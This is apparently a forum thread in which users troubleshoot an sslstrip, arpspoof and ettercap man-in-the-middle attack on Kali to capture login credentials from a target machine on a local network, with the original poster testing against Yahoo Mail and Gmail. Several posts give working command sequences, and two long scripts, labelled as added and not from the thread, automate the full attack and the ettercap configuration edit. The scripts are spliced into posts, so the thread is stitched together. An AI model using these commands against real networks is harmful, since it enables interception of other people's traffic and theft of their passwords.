
Thread: SSLStrip by ettercap

  #1 (joined 2013-Jul, 44 posts)

    Hi all,

    Trying to run sslstrip by ettercap as follows to capture the creds on Kali:

    # echo 1 > /proc/sys/net/ipv4/ip_forward
    # iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000
    # arpspoof -i eth0 -t 192.168.1.200 192.168.1.1
    # ettercap -T -i eth0
    # sslstrip -a


    but while running, ettercap gives the alert "SSL dissection needs a valid 'redir_command_on' script in the etter.conf file" and no creds are captured.
    Should I modify something in the "ettercap.conf" file? Or is anything wrong or missing in my configuration and procedure?

    Thanks a lot,

  #2 (joined 2013-Aug, 12 posts)
    Quote originally posted by xerxes:
    Hi all,

    Trying to run sslstrip by ettercap as follows to capture the creds on Kali:

    # echo 1 > /proc/sys/net/ipv4/ip_forward
    # iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000
    # arpspoof -i eth0 -t 192.168.1.200 192.168.1.1
    # ettercap -T -i eth0
    # sslstrip -a

    but while running, ettercap gives the alert "SSL dissection needs a valid 'redir_command_on' script in the etter.conf file" and no creds are captured.
    Should I modify something in the "ettercap.conf" file? Or is anything wrong or missing in my configuration and procedure?

    Thanks a lot,

    Hi, Type:

    gedit /etc/etter.conf&

    Delete:
    # if you use iptables:
    # redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    Insert:
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

  #3 (joined 2013-Jul, 44 posts)
    OK, I added these two lines to ettercap.conf, but still no creds are captured, though there's no error while running.

    redir_command_on = "iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000"
    redir_command_off = "iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000"

    Any help please?

  #4 (joined 2013-Aug, 25 posts)
    Use my script Hard track ... all problems will be fixed.

  #5 (joined 2013-Jul, 44 posts)
    Quote originally posted by lawrencethepentester:
    Use my script Hard track ... all problems will be fixed.
    OK, I installed the script and ran it, but the same problem exists. Kali does redirect traffic to the destination, but ettercap captures no credentials.
    I should say that I tested HTTPS (Yahoo Mail and Gmail), not HTTP. Does it matter?

    Rgds,
    Last edited by xerxes; 2013-09-02 at 19:56.

  #6 (joined 2013-Mar, 71 posts)
    This is what I do, because I have problems with the ARP spoofing in ettercap; I just use ettercap for credentials.

    echo 1 > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    sslstrip -k -l 8080 #to listen for traffic going through your redirected port, 8080

    I then move that terminal and open a new one and use

    arpspoof -i wlan0 -t 192.168.1.20 192.168.1.1 (FIRST ONE IS TARGET, SECOND IS GATEWAY)

    and leave that open

    Afterwards you can run urlsnarf -i wlan0 to sniff URLs.

    for credentials, I open another window and use

    ettercap -T -q -i wlan0 #to sniff for passwords ONLY.

    I've been using this method and have had 0 problems and it's effective.

  #7 (joined 2013-Mar, 71 posts)
    It could also be your sslstrip command.

    Maybe try
    sslstrip -k -l 10000 #since you're redirecting to go through port 10,000
    but I recommend my way, seeing how I have no problems with it.
    Plus, you have multiple terminals open and you can see how everything is running; for example,
    you can see the actual arpspoofing to make sure it's working, and you can view the ettercap passwords in the other terminal. Just follow exactly what I said, in that order, and you should have no problems.
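
    The sequence in posts #6 and #7 above, as an added example that is not part of the original thread: one script that runs the five steps (forwarding, nat REDIRECT, sslstrip, arpspoof, ettercap) with the listen port as a parameter, builds the add and delete forms of the redirect rule from a single template, checks the two things post #16 asks about before sniffing, and undoes every change on exit. The interface, victim, gateway and port values are assumptions set at the top and overridable from the environment; the script needs root and is meant for a lab network only.

```sh
#!/bin/sh
# Added example (not code from the thread): the manual sequence from the post
# above (ip_forward, nat REDIRECT, sslstrip, arpspoof, ettercap) as one script
# that builds the add and delete rules from a single template and undoes every
# change on exit. Interface, target, gateway and listen port are assumed
# values; override them in the environment. Root on a lab network only.
set -eu

IFACE="${IFACE:-wlan0}"             # assumed sniffing interface
TARGET="${TARGET:-192.168.1.20}"    # assumed victim
GATEWAY="${GATEWAY:-192.168.1.1}"   # assumed gateway
LPORT="${LPORT:-8080}"              # sslstrip listen port; the REDIRECT must point here
DRY_RUN="${DRY_RUN:-0}"             # DRY_RUN=1 prints each command instead of running it
SSLSTRIP_PID=""
ARPSPOOF_PID=""

# One template for both the -A (add) and -D (delete) forms. If the two are
# typed by hand and differ by a single flag, the delete silently fails and a
# stale REDIRECT survives the session.
redirect_rule() {   # $1 = A|D  $2 = iface  $3 = destination port  $4 = redirect port
    printf 'iptables -t nat -%s PREROUTING -i %s -p tcp --dport %s -j REDIRECT --to-port %s' \
        "$1" "$2" "$3" "$4"
}

run() {   # $1 = command line; printed in dry-run mode, eval'd otherwise
    if [ "$DRY_RUN" = 1 ]; then printf '%s\n' "$1"; else eval "$1"; fi
}

# Post #16 saw ip_forward drop back to 0 mid-session: keep the original value
# so cleanup restores it, and re-check it before trusting any capture.
ORIG_FORWARD=$(cat /proc/sys/net/ipv4/ip_forward 2>/dev/null || echo 0)

cleanup() {
    trap - EXIT INT TERM                       # run once, even on Ctrl-C
    run "$(redirect_rule D "$IFACE" 80 "$LPORT") 2>/dev/null || true"
    run "kill $SSLSTRIP_PID $ARPSPOOF_PID 2>/dev/null || true"
    run "echo $ORIG_FORWARD > /proc/sys/net/ipv4/ip_forward"
}

start() {
    trap cleanup EXIT INT TERM
    run "echo 1 > /proc/sys/net/ipv4/ip_forward"
    run "$(redirect_rule A "$IFACE" 80 "$LPORT")"
    run "sslstrip -k -l $LPORT -w sslstrip.log & SSLSTRIP_PID=\$!"
    run "arpspoof -i $IFACE -t $TARGET $GATEWAY >/dev/null 2>&1 & ARPSPOOF_PID=\$!"
    # The two checks from posts #16/#17: forwarding is on, and the rule is
    # visible in the nat table (plain 'iptables -L' shows the filter table only).
    run "[ \"\$(cat /proc/sys/net/ipv4/ip_forward)\" = 1 ] || { echo 'ip_forward is 0' >&2; exit 1; }"
    run "iptables -t nat -S PREROUTING | grep -q -- '--to-ports $LPORT' || { echo 'REDIRECT rule missing' >&2; exit 1; }"
    # Foreground: -T text mode, -q quiet, so only captured credentials are printed
    run "ettercap -T -q -i $IFACE"
}

case "${1:-}" in
    start) start ;;
    *)     echo "usage: DRY_RUN=1 $0 start   (drop DRY_RUN to run for real)" >&2 ;;
esac
```

    DRY_RUN=1 ./mitm-lab.sh start prints the exact commands without touching the system, which is the quickest way to catch a mismatch between the REDIRECT port and the sslstrip -l port. Run it as root without DRY_RUN to start the session; Ctrl-C ends ettercap and triggers the cleanup, so the nat rule and the forwarding setting do not outlive the test.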

  #8 (joined 2013-Jul, 44 posts)
    And haven't you made any changes to these two lines in ettercap.conf?

    redir_command_on = "iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000"
    redir_command_off = "iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000"

  #9 (joined 2013-Mar, 71 posts)
    I haven't changed anything. But I also only use ettercap to get passwords which is made by dsniff

  #10 (joined 2013-Jul, 44 posts)
    So I should use dsniff too? Would you please tell me the proper switches for dsniff for this issue? Thanks.

  #11 (joined 2013-Mar, 10 posts)
    The lines should stay the same:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    You just have to uncomment them by removing the "#" at the beginning.

  #12 (joined 2013-Jul, 44 posts)
    Quote originally posted by jnpa:
    The lines should stay the same:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    You just have to uncomment them by removing the "#" at the beginning.
    Without specifying the port number and other variables? For example, you mean %iface must not be replaced by eth0 or wlan0?

  #13 (joined 2013-Mar, 71 posts)
    To answer your question about dsniff, you don't need to do anything special. If you want to do it my way, just run all the commands I listed, in that order, in a terminal.

  #14 (joined 2013-Mar, 71 posts)
    Quote originally posted by xerxes:
    Without specifying the port number and other variables? For example, you mean %iface must not be replaced by eth0 or wlan0?
    And for this, you do not add your interface or anything. Literally just remove the comment marker (#) and that's it.
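
    What posts #11 and #14 describe (uncomment the two lines, keep the placeholders), as an added example that is not from the thread: a script that flips the two iptables lines in an etter.conf excerpt constructed here, reads the active value back, and reproduces the substitution ettercap performs on %iface, %port and %rport when it starts its SSL dissector. The config path and the rport value used in the demo are assumptions, not values taken from the thread.

```sh
#!/bin/sh
# Added example (not code from the thread): enable the iptables redir lines in
# etter.conf the way posts #11 and #14 describe, i.e. drop the leading '#' and
# leave %iface/%port/%rport in place, then show what ettercap substitutes at
# run time. The file excerpt below is constructed here; the real path on Kali
# is assumed to be /etc/ettercap/etter.conf (older builds: /etc/etter.conf).
set -eu

# Constructed excerpt of the redirect section, as shipped (everything commented).
write_sample_conf() {   # $1 = destination path
    cat > "$1" <<'EOF'
[redir_command]
# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
EOF
}

# Uncomment only the two iptables lines; the ipchains lines and the
# "# if you use iptables:" comment are left untouched. Placeholders stay as
# they are: ettercap expands them itself when it starts the SSL dissector.
enable_iptables_redir() {   # $1 = path to etter.conf, rewritten in place
    sed -e 's/^#\(redir_command_on = "iptables .*"\)$/\1/' \
        -e 's/^#\(redir_command_off = "iptables .*"\)$/\1/' "$1" > "$1.tmp" \
        && mv "$1.tmp" "$1"
}

# Print the active (uncommented) redir_command_on value without its quotes.
# Prints nothing while the key is still commented out, which is the state
# behind the "needs a valid 'redir_command_on' script" alert in post #1.
active_redir_on() {   # $1 = path to etter.conf
    sed -n 's/^redir_command_on = "\(.*\)"$/\1/p' "$1"
}

# Reproduce the substitution so the rule ettercap will run can be inspected:
# %iface comes from -i, %port is the port of the protocol being dissected
# (443 for https) and %rport is ettercap's own local SSL-wrapper port. The
# rport value used in the demo below is an assumed placeholder.
expand_redir() {   # $1 = template, $2 = iface, $3 = port, $4 = rport
    printf '%s\n' "$1" | sed -e "s/%iface/$2/g" -e "s/%port/$3/g" -e "s/%rport/$4/g"
}

# Demo on a temporary copy; nothing on the real system is touched.
conf=$(mktemp)
write_sample_conf "$conf"
echo "before: active value = '$(active_redir_on "$conf")'"
enable_iptables_redir "$conf"
echo "after:  template     = $(active_redir_on "$conf")"
echo "expanded for wlan0   = $(expand_redir "$(active_redir_on "$conf")" wlan0 443 60000)"
rm -f "$conf"
```

    Pointing enable_iptables_redir at the real file (assumed /etc/ettercap/etter.conf) does the edit from post #11 without a text editor, and active_redir_on is a quick check that the key is actually live before launching ettercap. Note that the expanded rule targets port 443, not 80: ettercap's own redirect serves its SSL dissection and is separate from the port-80 rule that feeds sslstrip.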

  #15 (joined 2013-Apr, Norway, 16 posts)
    When everything fails, try Subterfuge

    http://code.google.com/p/subterfuge/
    I would love to change the world, but they will not give me the source code!

  #16 (joined 2013-Jul, 44 posts)
    I observe two strange issues while working on this:

    1. When running ettercap, "ip_forward" goes back to 0 in spite of the "echo 1 > /proc/sys/net/ipv4/ip_forward" I did before; I have to run this command again after running ettercap.

    2. Should I see an extra rule in the iptables rules after running "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000"?
    There's no change in iptables before and after running this command.

  #17 (joined 2013-Mar, 10 posts)
    1. No, you don't need to run the command again.
    2. Yes, you should see an entry in iptables; just remember you have to list the nat table, so "iptables -L -t nat".

  #18 (joined 2013-Mar, 38 posts)
    Paraponera framework, Subterfuge, easy-creds: all those tools will automate this process for you.

    If you still want to try it manually, I would also suggest scrapping ettercap for the MITM; arpspoof is much better at it.

    Ettercap tends to DoS more than MITM and pass through; however, it's still great for sniffing and getting the creds.

  #19 (joined 2013-Jul, 44 posts)
    Thanks, guys. Now it works fine with IE, but not with Firefox. After accepting the certificate warning, it shows nothing but Firefox's "The connection was reset" page.
    Any clue?

  #20 (joined 2017-Jun, 2 posts)
    It may be possible that port 8080 isn't accepting the traffic. You can make it accept by using the following command:
    iptables -I INPUT -p tcp --dport 8080 -j ACCEPT

    After this, check if the port is accepting traffic by using the following command:
    iptables -L INPUT
